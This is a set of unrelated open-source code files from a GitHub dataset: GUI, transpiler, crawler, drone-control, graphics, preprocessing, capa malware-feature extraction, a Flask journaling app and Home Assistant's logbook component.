0, wx.ALL, 5)\n sizer[\"wrapper\"].Add(sizer[key], 0, wx.EXPAND | wx.ALL, 5)\n\n sizer[\"wrapper\"].Add(self.label_progress, 0, wx.TOP | wx.LEFT, 10)\n 
sizer[\"wrapper\"].Add(self.gauge, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 10)\n sizer[\"time\"].Add(self.label_elapsed, 1, wx.EXPAND | wx.LEFT, 10)\n sizer[\"time\"].Add(self.label_remaining, 0, wx.RIGHT, 10)\n sizer[\"wrapper\"].Add(sizer[\"time\"], 1, wx.EXPAND, 0)\n\n sizer[\"exec\"].Add((20, 20), 1, wx.EXPAND, 0)\n sizer[\"exec\"].Add(self.button[\"exec\"], 0, wx.EXPAND | wx.ALL, 5)\n sizer[\"wrapper\"].Add(sizer[\"exec\"], 0, wx.EXPAND | wx.ALL, 10)\n\n self.SetSizer(sizer[\"wrapper\"])\n self.Fit()\n self.Layout()\n self.Center()\n\n def browse(self, key, msg):\n dlg = wx.DirDialog(\n self,\n msg,\n \"\",\n style=wx.DD_DIR_MUST_EXIST | wx.DD_DEFAULT_STYLE,\n )\n\n if dlg.ShowModal() == wx.ID_OK:\n self.text_ctrl[key].SetValue(dlg.GetPath())\n dlg.Destroy()\n\n def on_browse_scan(self, *evt):\n self.browse(\"scan\", \"Select a Scanning Directory\")\n if not self.text_ctrl[\"output\"].GetValue():\n self.text_ctrl[\"output\"].SetValue(\n self.text_ctrl[\"scan\"].GetValue()\n )\n\n def on_browse_output(self, *evt):\n self.browse(\"output\", \"Select an Output Directory\")\n\n def enable_start(self, *evt):\n self.button[\"exec\"].Enable(\n isdir(self.text_ctrl[\"scan\"].GetValue())\n and isdir(self.text_ctrl[\"output\"].GetValue())\n )\n\n def on_button_exec(self, *evt):\n if self.button[\"exec\"].GetLabel() == \"Start\":\n self.run()\n else:\n self.close()\n\n def set_title(self, msg):\n wx.CallAfter(self.SetTitle, msg)\n\n def update(self, msg):\n if msg[\"gauge\"] == 1:\n self.button[\"exec\"].SetLabelText(\"Close\")\n self.button[\"exec\"].Enable()\n progress = f\"Processing File: {msg['progress']}\"\n elapsed = f\"Elapsed: {msg['elapsed']}\"\n remaining = f\"Est. Remaining: {msg['remaining']}\"\n if msg[\"progress\"]:\n wx.CallAfter(self.label_progress.SetLabelText, progress)\n elif msg[\"gauge\"] == 1:\n label = self.label_progress.GetLabel()\n if \"/\" in label:\n count = self.label_progress.GetLabel().split(\"/\")[1]\n label = f\"COMPLETE: Processed {count} file(s)\"\n else:\n label = \"COMPLETE\"\n wx.CallAfter(self.label_progress.SetLabelText, label)\n wx.CallAfter(self.label_remaining.SetLabelText, \"\")\n if msg[\"elapsed\"]:\n wx.CallAfter(self.label_elapsed.SetLabelText, elapsed)\n if msg[\"remaining\"]:\n wx.CallAfter(self.label_remaining.SetLabelText, remaining)\n wx.CallAfter(self.gauge.SetValue, int(100 * msg[\"gauge\"]))\n wx.CallAfter(self.Layout)\n\n def close(self, *evt):\n pub.unsubAll(topicName=\"progress_update\")\n self.parent.pdf_miner_window = None\n wx.CallAfter(self.Destroy)\n\n\nclass ProgressFrameWorker(Thread):\n \"\"\"Create a thread, perform action on each item in obj_list\"\"\"\n\n def __init__(self, iqdm_pdf_kwargs):\n Thread.__init__(self)\n self.iqdm_pdf_kwargs = iqdm_pdf_kwargs\n self.iqdm_pdf_kwargs[\"callback\"] = self.callback\n self.start()\n\n def run(self):\n process_files(**self.iqdm_pdf_kwargs)\n\n @staticmethod\n def callback(msg):\n gauge = 100 if msg == \"complete\" else int(msg.split(\"%|\")[0])\n if msg == \"complete\":\n progress = elapsed = remaining = \"\"\n else:\n progress = msg.split(\"| \")[1].split(\" \")[0]\n elapsed = msg.split(\"[\")[1].split(\"<\")[0]\n remaining = msg.split(\"<\")[1].split(\",\")[0]\n msg = {\n \"gauge\": gauge / 100.0,\n \"progress\": progress,\n \"elapsed\": elapsed,\n \"remaining\": remaining,\n }\n pub.sendMessage(\"progress_update\", 
msg=msg)\n","repo_name":"IQDM/IQDM-Analytics","sub_path":"iqdma/pdf_miner.py","file_name":"pdf_miner.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11613538946","text":"from .lexer import operators\n\nTRANS = {\n 'INT': 'Long', 'FLOAT': 'Single', 'DOUBLE': 'Double', 'STRING': 'string', 'BOOL': 'Boolean',\n 'LOGIC_AND': 'And', 'LOGIC_OR': 'Or', 'LOGIC_Not': 'Not',\n 'ARITHMETIC_AND': 'And', 'ARITHMETIC_OR': 'Or', 'ARITHMETIC_NOT': 'Not', 'XOR': 'Xor',\n 'PLUS': '+', 'MINUS': '-', 'NEG': '-', 'MUL': '*', 'MOD': 'Mod', 'DIV': '/', 'INTDIV': '\\\\',\n 'GET': '>=', 'LET': '<=', 'LT': '<', 'GT': '>', 'EQUAL': '=', 'NOT_EQUAL': '<>',\n}\n\n\nclass ASTnode(object):\n def __init__(self, type, value, childs):\n self.type = type\n self.value = value\n self.childs = []\n for i in childs:\n self.add_child(i)\n self.parent = self\n\n def add_child(self, node):\n node.parent = self\n self.childs.append(node)\n\n def __str__(self, r=0):\n ret = ' ' * r + self.type + ' ' + str(self.value) + '\\n'\n for i in self.childs:\n ret = ret + i.__str__(r+1)\n return ret\n\n def dot(self, prefix='n'):\n if prefix == 'n':\n return 'graph\\n{\\n%s}\\n' % self.dot(prefix='n0')\n ret = ' %s;\\n' % prefix + \\\n ' %s [label=\\\"%s\\\"]\\n' % (prefix, str(self.value))\n count = 0\n for i in self.childs:\n ret = \"%s %s -- %s\\n%s\" % (ret, prefix, prefix +\n str(count), i.dot(prefix=prefix + str(count)))\n count = count + 1\n return ret\n\n def vb(self, r=0, shift=' '):\n if self.type == 'IDENTIFIER':\n ret = self.value\n for i in self.childs[0].childs:\n ret = ret + '(%s)' % i.vb()\n return ret\n elif self.type == 'DECLARE':\n ret = ''\n for i in self.childs:\n if len(i.childs) == 1:\n ret = ret + \\\n '%s As %s, ' % (i.childs[0].vb(), TRANS[i.type])\n else:\n ret = ret + \\\n '%s As %s = %s, ' % (\n i.childs[0].vb(), TRANS[i.type], i.childs[1].vb())\n return shift*r + 'Dim ' + ret[0:-2] + '\\n'\n elif self.type == 'ARGSDECLARE':\n ret = ''\n for arg in self.childs:\n identifier = arg.childs[0].vb()\n ret = ret + '%s As %s, ' % (identifier, TRANS[arg.type])\n return ret[:-2]\n elif self.type == 'FUNCDECLARE':\n identifier = self.childs[0].vb()\n parameters = self.childs[1].vb()\n statements = self.childs[2].vb(r=r+1)\n if self.value == 'VOID':\n return 'Sub %s(%s)\\n%sEnd Sub\\n' % (identifier, parameters, statements)\n else:\n return 'Function %s(%s) As %s\\n%sEnd Function\\n' % (identifier, parameters, TRANS[self.value], statements)\n elif self.type == 'STATEMENT':\n return shift*r + self.childs[0].vb() + '\\n'\n elif self.type == 'STATEMENTS':\n ret = ''\n for i in self.childs:\n ret = ret + i.vb(r=r)\n return ret\n elif self.type == 'ASSIGN':\n return self.childs[0].vb() + ' = ' + self.childs[1].vb()\n elif self.type == 'ASSIGNS':\n ret = ''\n for assign in self.childs:\n ret = ret + assign.vb() + ': '\n return ret[:-2]\n elif self.type == 'IF':\n ret = shift*r + \\\n 'If %s Then\\n' % self.childs[0].vb() + self.childs[1].vb(r=r+1)\n if (len(self.childs) == 3):\n ret = ret + shift*r + 'Else\\n' + \\\n self.childs[2].vb(r=r+1)\n ret = ret + shift*r + 'End If\\n'\n return ret\n elif self.type == 'WHILE':\n print(self)\n return shift*r + 'Do While ' + self.childs[0].vb() + '\\n' + \\\n self.childs[1].vb(r=r+1) + \\\n shift*r + 'Loop\\n'\n elif self.type == 'FOR':\n self.type, self.value = 'WHILE', 'while'\n return shift*r + self.childs[0].vb() + ['', '\\n'][self.childs[0].type == 'ASSIGNS'] + \\\n shift*r + 'Do 
While ' + self.childs[1].vb() + '\\n' + \\\n self.childs[3].vb(r=r+1) + \\\n shift*(r+1) + self.childs[2].vb() + '\\n' + \\\n shift*r + 'Loop\\n'\n elif self.type == 'FUNCTIONCALL':\n identifier = self.childs[0].vb()\n if self.idt.ask(identifier) == 'VOID':\n ret = shift*r + identifier + ' ' + \\\n self.childs[1].vb() + '\\n'\n return ret\n else:\n ret = identifier + '(' + self.childs[1].vb() + ')'\n return ret\n elif self.type == 'ARGS':\n ret = ''\n for i in self.childs:\n ret = ret + i.vb() + ', '\n return ret[0:-2]\n elif self.type == 'CONST':\n ret = ''\n for i in self.childs:\n ret = ret + \\\n '%s As %s = %s, ' % (\n i.childs[0].vb(), TRANS[i.type], i.childs[1].vb())\n return 'Const ' + ret[0:-2] + '\\n'\n elif self.type == 'DIGIT_CONSTANT':\n return str(self.value)\n elif self.type == 'STRING_CONSTANT':\n return '\\\"%s\\\"' % self.value\n elif self.type == 'ROOT':\n ret = ''\n for i in self.childs:\n ret = ret + i.vb()\n return ret\n elif self.type == 'BREAK':\n loop = ''\n f = self.parent\n while True:\n if f.type == 'FOR':\n return shift*r + 'Exit For\\n'\n elif f.type == 'WHILE':\n return shift*r + 'Exit Do\\n'\n assert(self.type != 'ROOT')\n f = f.parent\n elif self.type == 'RETURN':\n p = self.parent\n while True:\n if p.type == 'FUNCDECLARE':\n if p.value == 'VOID':\n return shift*r + 'Exit Sub\\n'\n else:\n identifier = p.childs[0].vb()\n expr = self.childs[0].vb()\n return shift*r + identifier + ' = ' + expr + '\\n' + \\\n shift*r + 'Exit Function\\n'\n p = p.parent\n elif self.value in operators:\n if self.type in ['LOGIC_NOT', 'NEG', 'ARITHMETIC_NOT']:\n return TRANS[self.type]+self.childs[0].vb()\n else:\n return '('+self.childs[0].vb()+' '+TRANS[self.type]+' '+self.childs[1].vb()+')'\n","repo_name":"Gesrua/c2vb","sub_path":"c2vb/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"30444604262","text":"# from urllib import request\n\nimport urllib.request\nimport re\nimport requests\n#coding=utf-8\nimport time\nimport os\n\n\n\nclass WebCrawler():\n filepath = 'D:/WallPaper/'\n url = 'https://www.huya.com/g/4079'\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'}\n \n root_pattern = '
  • '\n imgurl_pattern = '= 20:\n return False\n return True\n\n def disableArm(self):\n self.vehicle.armed = False\n time.sleep(1)\n return True\n\n def simple_start(self, height):\n print(\"Предполетные проверки\")\n if self.enableArm():\n print(\"Запускаем двигатели\")\n self.vehicle.mode = VehicleMode(\"GUIDED\")\n if self.vehicle.armed:\n time.sleep(3) # подождать!\n print(\"Взлет!\")\n self.vehicle.simple_takeoff(height) # взлететь!\n while self.vehicle.location.global_relative_frame.alt < height:\n print(\" Текущая высота: \", self.vehicle.location.global_relative_frame.alt)\n # Что бы не скучно было, смотрим как высоко уже поднялись\n time.sleep(1)\n self.simple_stop()\n print('Что-то поломалось! =(')\n return False\n\n def checkArrived(self, location, precision=0.3):\n veh_loc = self.vehicle.location.global_relative_frame\n d_lat = (location[0] - veh_loc.lat) * 1.113195e5\n d_lon = (location[1] - veh_loc.lon) * 1.113195e5\n d_alt = location[3] - veh_loc.alt\n if math.sqrt(d_lat ** 2 + d_lon ** 2 + d_alt ** 2) < precision:\n print(\"На месте\")\n return True\n return False\n\n def goToLocation(self, location):\n relative_location = LocationGlobalRelative(location[0], location[1],location[2])\n self.vehicle.simple_goto(relative_location)\n while not self.checkArrived(location):\n time.sleep(3)\n return True\n\n def startMission(self):\n pass\n\n def simple_stop(self):\n self.vehicle.mode = \"LAND\"\n if self.disableArm():\n print('done!!!')\n return True\n print('Что-то поломалось! =(')\n return False\n\n def goHome(self):\n self.vehicle.mode = VehicleMode(\"RTL\")\n return True\n\n\nimport os,sys\n\nsys.stderr = open(os.devnull, \"w\")\ntry:\n import psutil\n#except:\n #handle module not found\nfinally:\n sys.stderr = sys.__stderr__\n\n\ndrone = DroneLit_Base(True)\ndrone.simple_start(0.1)\ndrone.simple_stop()\ndrone.__del__()","repo_name":"azibf/SKAT","sub_path":"БРЭО/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6127,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19864403788","text":"from geometry.sphereGeometry import SphereGeometry\r\nfrom material.surfaceMaterial import SurfaceMaterial\r\nfrom core.mesh import Mesh\r\n\r\nclass PointLightHelper(Mesh):\r\n\r\n def __init__(self, pointLight, size=0.1, lineWidth=1):\r\n color = pointLight.color\r\n geometry = SphereGeometry(\r\n radius=size, radiusSegments=4, heightSegments=2)\r\n material = SurfaceMaterial({\r\n \"baseColor\": color,\r\n \"wireframe\": True,\r\n \"doubleSide\": True,\r\n \"lineWidth\": lineWidth\r\n })\r\n super().__init__(geometry, material)\r\n","repo_name":"EagleEatApple/pyside6gl","sub_path":"pygame/ch6/extras/pointLightHelper.py","file_name":"pointLightHelper.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"36541018435","text":"\"\"\"\n4.Write a program which accept one number form user and return addition of its factors.\nInput :12\nOutput : 16 \t(1+2+3+4+6)\n\"\"\"\n\n\n\ndef Add_of_Factors(iNo):\n\t\n\tif iNo < 0:\n\t\treturn -1;\n\tsum = 0;\n\tfor i in range(1,iNo//2+1):\n\t\tif iNo % i == 0:\n\t\t\tsum += i;\n\t\n\treturn sum;\n\ndef main():\n\t\n\tival = int(input(\"Enter val: \"));\n\tival = Add_of_Factors(ival);\n\t\n\tif ival == -1:\n\t\tprint(\"Invalid input\");\n\telse:\n\t\tprint(\"Addition of all Factors is : \",ival);\n\nif __name__ == 
\"__main__\":\n\tmain();\n","repo_name":"DilipBDabahde/PythonExample","sub_path":"Assignment_2/FactorsAddition.py","file_name":"FactorsAddition.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"22635894647","text":"import logging\nimport os\nimport pickle as pkl\nimport random\nfrom multiprocessing import Pool\n\nimport PIL\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom face_alignment import FaceAlignment, LandmarksType\nfrom torch.utils.data import Dataset\n\nK = 8\n\n\ndef preprocess_dataset(source, output, device='cpu', size=0, overwrite=False):\n logging.info('===== DATASET PRE-PROCESSING =====')\n logging.info(f'Running on {device.upper()}.')\n logging.info(f'Saving K+1 random frames from each video (K = {K}).')\n fa = FaceAlignment(LandmarksType._2D, device=device)\n\n video_list = get_video_list(source, size, output, overwrite=overwrite)\n\n logging.info(f'Processing {len(video_list)} videos...')\n\n init_pool(fa, output)\n counter = 1\n for v in video_list:\n process_video_folder(v)\n logging.info(f'{counter}/{len(video_list)}')\n counter += 1\n\n logging.info(f'All {len(video_list)} videos processed.')\n\n\ndef get_video_list(source, size, output, overwrite=True):\n already_processed = []\n if not overwrite:\n already_processed = [\n os.path.splitext(video_id)[0]\n for root, dirs, files in os.walk(output)\n for video_id in files\n ]\n\n video_list = []\n counter = 0\n for root, dirs, files in os.walk(source):\n if len(files) > 0 and os.path.basename(os.path.normpath(root)) not in already_processed:\n assert contains_only_videos(files) and len(dirs) == 0\n video_list.append((root, files))\n counter += 1\n if 0 < size <= counter:\n break\n\n return video_list\n\n\ndef init_pool(face_alignment, output):\n global _FA\n _FA = face_alignment\n global _OUT_DIR\n _OUT_DIR = output\n\n\ndef process_video_folder(video):\n folder, files = video\n\n try:\n assert contains_only_videos(files)\n frames = np.concatenate([extract_frames(os.path.join(folder, f)) for f in files])\n\n save_video(\n frames=select_random_frames(frames),\n video_id=os.path.basename(os.path.normpath(folder)),\n path=_OUT_DIR,\n face_alignment=_FA\n )\n except Exception as e:\n logging.error(f'Video {os.path.basename(os.path.normpath(folder))} could not be processed:\\n{e}')\n\n\ndef contains_only_videos(files, extension='.mp4'):\n \"\"\"\n Checks whether the files provided all end with the specified video extension.\n :param files: List of file names.\n :param extension: Extension that all files should have.\n :return: True if all files end with the given extension.\n \"\"\"\n return len([x for x in files if os.path.splitext(x)[1] != extension]) == 0\n\n\ndef extract_frames(video):\n cap = cv2.VideoCapture(video)\n\n n_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n frames = np.empty((n_frames, h, w, 3), np.dtype('uint8'))\n\n fn, ret = 0, True\n while fn < n_frames and ret:\n ret, img = cap.read()\n frames[fn] = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n fn += 1\n\n cap.release()\n return frames\n\n\ndef select_random_frames(frames):\n S = random.sample(range(len(frames)), k=K+1) \n return [frames[s] for s in S]\n\n\ndef save_video(path, video_id, frames, face_alignment):\n if not os.path.isdir(path):\n os.makedirs(path)\n\n data = []\n for i in range(len(frames)):\n x = frames[i]\n y = 
face_alignment.get_landmarks(x)[0]\n data.append({\n 'frame': x,\n 'landmarks': y,\n })\n\n filename = f'{video_id}.vid'\n pkl.dump(data, open(os.path.join(path, filename), 'wb'))\n logging.info(f'Saved file: {filename}')\n\n\nif __name__ == '__main__':\n # preprocess_dataset(\"D:\\Voxceleb2\", \"D:\\VoxPickle\", size=1000)\n pass","repo_name":"tusharGOEL1/TalkingHeads","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26371419559","text":"import string\nimport struct\n\nfrom capa.features.common import Characteristic\nfrom capa.features.basicblock import BasicBlock\nfrom capa.features.extractors.helpers import MIN_STACKSTRING_LEN\n\n\ndef _bb_has_tight_loop(f, bb):\n \"\"\"\n parse tight loops, true if last instruction in basic block branches to bb start\n \"\"\"\n return bb.offset in f.blockrefs[bb.offset] if bb.offset in f.blockrefs else False\n\n\ndef extract_bb_tight_loop(f, bb):\n \"\"\"check basic block for tight loop indicators\"\"\"\n if _bb_has_tight_loop(f, bb):\n yield Characteristic(\"tight loop\"), bb.offset\n\n\ndef _bb_has_stackstring(f, bb):\n \"\"\"\n extract potential stackstring creation, using the following heuristics:\n - basic block contains enough moves of constant bytes to the stack\n \"\"\"\n count = 0\n for instr in bb.getInstructions():\n if is_mov_imm_to_stack(instr):\n count += get_printable_len(instr.getDetailed())\n if count > MIN_STACKSTRING_LEN:\n return True\n return False\n\n\ndef get_operands(smda_ins):\n return [o.strip() for o in smda_ins.operands.split(\",\")]\n\n\ndef extract_stackstring(f, bb):\n \"\"\"check basic block for stackstring indicators\"\"\"\n if _bb_has_stackstring(f, bb):\n yield Characteristic(\"stack string\"), bb.offset\n\n\ndef is_mov_imm_to_stack(smda_ins):\n \"\"\"\n Return if instruction moves immediate onto stack\n \"\"\"\n if not smda_ins.mnemonic.startswith(\"mov\"):\n return False\n\n try:\n dst, src = get_operands(smda_ins)\n except ValueError:\n # not two operands\n return False\n\n try:\n int(src, 16)\n except ValueError:\n return False\n\n if not any(regname in dst for regname in [\"ebp\", \"rbp\", \"esp\", \"rsp\"]):\n return False\n\n return True\n\n\ndef is_printable_ascii(chars):\n return all(c < 127 and chr(c) in string.printable for c in chars)\n\n\ndef is_printable_utf16le(chars):\n if all(c == 0x00 for c in chars[1::2]):\n return is_printable_ascii(chars[::2])\n\n\ndef get_printable_len(instr):\n \"\"\"\n Return string length if all operand bytes are ascii or utf16-le printable\n\n Works on a capstone instruction\n \"\"\"\n # should have exactly two operands for mov immediate\n if len(instr.operands) != 2:\n return 0\n\n op_value = instr.operands[1].value.imm\n\n if instr.imm_size == 1:\n chars = struct.pack(\" 0:\n avg_sentiment = sum(sentiments) / len(sentiments)\n else:\n avg_sentiment = 0\n\n # Determine sentiment description\n if avg_sentiment > 0.5:\n sentiment_desc = 'positive'\n elif avg_sentiment < -0.5:\n sentiment_desc = 'challenging'\n else:\n sentiment_desc = 'mixed'\n\n common_words = bag_of_words.most_common(5)\n themes = ', '.join([word[0] for word in common_words])\n\n # Use the OpenAI API to generate a creative summary\n prompt = f\"The weeks sentiment score for rose, bud, thorn reflections was {avg_sentiment} and the recurring words in the reflections were {themes}. Create a personalized summary of these results for the specific user. 
Don't specifically mention snetiment score discuss what the score represents for the user. Talk using your and you.\"\n\n response = openai.Completion.create(\n engine=\"text-davinci-003\", prompt=prompt, max_tokens=60, temperature=0.85)\n\n summary_text = response.choices[0].text.strip()\n\n # Store the summary in Firebase\n user_summaries_subcol = db.collection('summaries').document(\n user_id).collection('user_summaries')\n user_summaries_subcol.add({\n 'date': date.today().strftime('%Y-%m-%d'),\n 'summary': summary_text\n })\n return summary_text\n\n\n@app.route('/api/reflections', methods=['POST'])\ndef get_reflections():\n \"\"\"Fetch the user's reflections based on their user_id.\"\"\"\n user_id = request.json.get('user_id')\n\n if not user_id:\n return jsonify({'message': 'user_id not provided'}), 400\n\n try:\n # Fetch the reflections for the given user from Firestore\n user_reflections = db.collection('reflections').document(\n user_id).collection('user_reflections').stream()\n\n reflections_data = {}\n for reflection in user_reflections:\n data = reflection.to_dict()\n reflections_data[data['date']] = {\n 'bud': data.get('bud'),\n 'thorn': data.get('thorn'),\n 'rose': data.get('rose'),\n }\n\n if not reflections_data:\n return jsonify({'message': 'No reflections found for this user.'}), 404\n\n return jsonify(reflections_data), 200\n except Exception as e:\n error_message = str(e)\n return jsonify({'message': 'Error fetching reflections', 'error': error_message}), 500\n\n\n@app.route('/api/summaries', methods=['POST'])\ndef get_summaries():\n \"\"\"Fetch the user's weekly summaries based on their user_id.\"\"\"\n user_id = request.json.get('user_id')\n\n if not user_id:\n return jsonify({'message': 'user_id not provided'}), 400\n\n try:\n # Fetch the reflections for the given user from Firestore\n user_summaries = db.collection('summaries').document(\n user_id).collection('user_summaries').stream()\n\n summary_data = {}\n for summary in user_summaries:\n data = summary.to_dict()\n summary_data[data['date']] = {\n 'summary': data.get('summary')\n }\n\n if not summary_data:\n return jsonify({'message': 'No reflections found for this user.'}), 404\n\n return jsonify(summary_data), 200\n except Exception as e:\n error_message = str(e)\n return jsonify({'message': 'Error fetching reflections', 'error': error_message}), 500\n\n\nif __name__ == '__main__':\n app.run(port=8000, debug=True)\n","repo_name":"MarlonGrandy/RoseBudThorn","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20417198715","text":"\"\"\"\nEvent parser and human readable log generator.\n\nFor more details about this component, please refer to the documentation at\nhttps://home-assistant.io/components/logbook/\n\"\"\"\nfrom datetime import timedelta\nfrom itertools import groupby\nimport logging\n\nimport voluptuous as vol\n\nfrom homeassistant.components import sun\nfrom homeassistant.components.http import HomeAssistantView\nfrom homeassistant.const import (\n ATTR_DOMAIN, ATTR_ENTITY_ID, ATTR_HIDDEN, ATTR_NAME, CONF_EXCLUDE,\n CONF_INCLUDE, EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP,\n EVENT_LOGBOOK_ENTRY, EVENT_STATE_CHANGED, HTTP_BAD_REQUEST, STATE_NOT_HOME,\n STATE_OFF, STATE_ON)\nfrom homeassistant.core import DOMAIN as HA_DOMAIN\nfrom homeassistant.core import State, callback, split_entity_id\nimport homeassistant.helpers.config_validation as 
cv\nimport homeassistant.util.dt as dt_util\n\n_LOGGER = logging.getLogger(__name__)\n\nATTR_MESSAGE = 'message'\n\nCONF_DOMAINS = 'domains'\nCONF_ENTITIES = 'entities'\nCONTINUOUS_DOMAINS = ['proximity', 'sensor']\n\nDEPENDENCIES = ['recorder', 'frontend']\n\nDOMAIN = 'logbook'\n\nGROUP_BY_MINUTES = 15\n\nCONFIG_SCHEMA = vol.Schema({\n DOMAIN: vol.Schema({\n CONF_EXCLUDE: vol.Schema({\n vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,\n vol.Optional(CONF_DOMAINS, default=[]):\n vol.All(cv.ensure_list, [cv.string])\n }),\n CONF_INCLUDE: vol.Schema({\n vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,\n vol.Optional(CONF_DOMAINS, default=[]):\n vol.All(cv.ensure_list, [cv.string])\n })\n }),\n}, extra=vol.ALLOW_EXTRA)\n\nALL_EVENT_TYPES = [\n EVENT_STATE_CHANGED, EVENT_LOGBOOK_ENTRY,\n EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP\n]\n\nLOG_MESSAGE_SCHEMA = vol.Schema({\n vol.Required(ATTR_NAME): cv.string,\n vol.Required(ATTR_MESSAGE): cv.template,\n vol.Optional(ATTR_DOMAIN): cv.slug,\n vol.Optional(ATTR_ENTITY_ID): cv.entity_id,\n})\n\n\ndef log_entry(hass, name, message, domain=None, entity_id=None):\n \"\"\"Add an entry to the logbook.\"\"\"\n hass.add_job(async_log_entry, hass, name, message, domain, entity_id)\n\n\ndef async_log_entry(hass, name, message, domain=None, entity_id=None):\n \"\"\"Add an entry to the logbook.\"\"\"\n data = {\n ATTR_NAME: name,\n ATTR_MESSAGE: message\n }\n\n if domain is not None:\n data[ATTR_DOMAIN] = domain\n if entity_id is not None:\n data[ATTR_ENTITY_ID] = entity_id\n hass.bus.async_fire(EVENT_LOGBOOK_ENTRY, data)\n\n\nasync def setup(hass, config):\n \"\"\"Listen for download events to download files.\"\"\"\n @callback\n def log_message(service):\n \"\"\"Handle sending notification message service calls.\"\"\"\n message = service.data[ATTR_MESSAGE]\n name = service.data[ATTR_NAME]\n domain = service.data.get(ATTR_DOMAIN)\n entity_id = service.data.get(ATTR_ENTITY_ID)\n\n message.hass = hass\n message = message.async_render()\n async_log_entry(hass, name, message, domain, entity_id)\n\n hass.http.register_view(LogbookView(config.get(DOMAIN, {})))\n\n await hass.components.frontend.async_register_built_in_panel(\n 'logbook', 'logbook', 'mdi:format-list-bulleted-type')\n\n hass.services.async_register(\n DOMAIN, 'log', log_message, schema=LOG_MESSAGE_SCHEMA)\n return True\n\n\nclass LogbookView(HomeAssistantView):\n \"\"\"Handle logbook view requests.\"\"\"\n\n url = '/api/logbook'\n name = 'api:logbook'\n extra_urls = ['/api/logbook/{datetime}']\n\n def __init__(self, config):\n \"\"\"Initialize the logbook view.\"\"\"\n self.config = config\n\n async def get(self, request, datetime=None):\n \"\"\"Retrieve logbook entries.\"\"\"\n if datetime:\n datetime = dt_util.parse_datetime(datetime)\n\n if datetime is None:\n return self.json_message('Invalid datetime', HTTP_BAD_REQUEST)\n else:\n datetime = dt_util.start_of_local_day()\n\n start_day = dt_util.as_utc(datetime)\n end_day = start_day + timedelta(days=1)\n hass = request.app['hass']\n\n def json_events():\n \"\"\"Fetch events and generate JSON.\"\"\"\n return self.json(list(\n _get_events(hass, self.config, start_day, end_day)))\n\n return await hass.async_add_job(json_events)\n\n\nclass Entry(object):\n \"\"\"A human readable version of the log.\"\"\"\n\n def __init__(self, when=None, name=None, message=None, domain=None,\n entity_id=None):\n \"\"\"Initialize the entry.\"\"\"\n self.when = when\n self.name = name\n self.message = message\n self.domain = domain\n self.entity_id 
= entity_id\n\n def as_dict(self):\n \"\"\"Convert entry to a dict to be used within JSON.\"\"\"\n return {\n 'when': self.when,\n 'name': self.name,\n 'message': self.message,\n 'domain': self.domain,\n 'entity_id': self.entity_id,\n }\n\n\ndef humanify(events):\n \"\"\"Generate a converted list of events into Entry objects.\n\n Will try to group events if possible:\n - if 2+ sensor updates in GROUP_BY_MINUTES, show last\n - if home assistant stop and start happen in same minute call it restarted\n \"\"\"\n domain_prefixes = tuple('{}.'.format(dom) for dom in CONTINUOUS_DOMAINS)\n\n # Group events in batches of GROUP_BY_MINUTES\n for _, g_events in groupby(\n events,\n lambda event: event.time_fired.minute // GROUP_BY_MINUTES):\n\n events_batch = list(g_events)\n\n # Keep track of last sensor states\n last_sensor_event = {}\n\n # Group HA start/stop events\n # Maps minute of event to 1: stop, 2: stop + start\n start_stop_events = {}\n\n # Process events\n for event in events_batch:\n if event.event_type == EVENT_STATE_CHANGED:\n entity_id = event.data.get('entity_id')\n\n if entity_id.startswith(domain_prefixes):\n last_sensor_event[entity_id] = event\n\n elif event.event_type == EVENT_HOMEASSISTANT_STOP:\n if event.time_fired.minute in start_stop_events:\n continue\n\n start_stop_events[event.time_fired.minute] = 1\n\n elif event.event_type == EVENT_HOMEASSISTANT_START:\n if event.time_fired.minute not in start_stop_events:\n continue\n\n start_stop_events[event.time_fired.minute] = 2\n\n # Yield entries\n for event in events_batch:\n if event.event_type == EVENT_STATE_CHANGED:\n\n to_state = State.from_dict(event.data.get('new_state'))\n\n domain = to_state.domain\n\n # Skip all but the last sensor state\n if domain in CONTINUOUS_DOMAINS and \\\n event != last_sensor_event[to_state.entity_id]:\n continue\n\n # Don't show continuous sensor value changes in the logbook\n if domain in CONTINUOUS_DOMAINS and \\\n to_state.attributes.get('unit_of_measurement'):\n continue\n\n yield Entry(\n event.time_fired,\n name=to_state.name,\n message=_entry_message_from_state(domain, to_state),\n domain=domain,\n entity_id=to_state.entity_id)\n\n elif event.event_type == EVENT_HOMEASSISTANT_START:\n if start_stop_events.get(event.time_fired.minute) == 2:\n continue\n\n yield Entry(\n event.time_fired, \"Home Assistant\", \"started\",\n domain=HA_DOMAIN)\n\n elif event.event_type == EVENT_HOMEASSISTANT_STOP:\n if start_stop_events.get(event.time_fired.minute) == 2:\n action = \"restarted\"\n else:\n action = 